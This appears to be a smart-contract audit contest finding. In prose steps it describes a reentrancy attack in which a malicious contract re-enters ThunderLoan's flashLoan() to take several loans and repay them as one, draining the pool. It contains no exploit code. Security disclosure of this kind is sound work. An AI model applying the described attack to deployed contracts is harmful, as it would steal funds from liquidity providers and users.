Attacker can do a reentrancy attack using the above function and taking several loans and repaying it as 1.
Attacker: the malicious user.
Victim: other users, LPs, ThunderLoan.
Protocol: The ThunderLoan contract itself.
Initial State: The protocol is deployed
Step 1: the attacker decides to take a flash Loan using a malicious contract that calls the flashLoan() function.
Step 2: the protocol makes the error of making an external call to the attacker's malicious contract that contains a receive() that will call back flashLoan() with the same amount, that will decrease the startingBalance.
Step 3: The attacker gets away by repaying what he's owed for his last flashLoan request.
Attacker can take several loans and repay them as 1, draining a lot of funds from the contract
Manual review
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.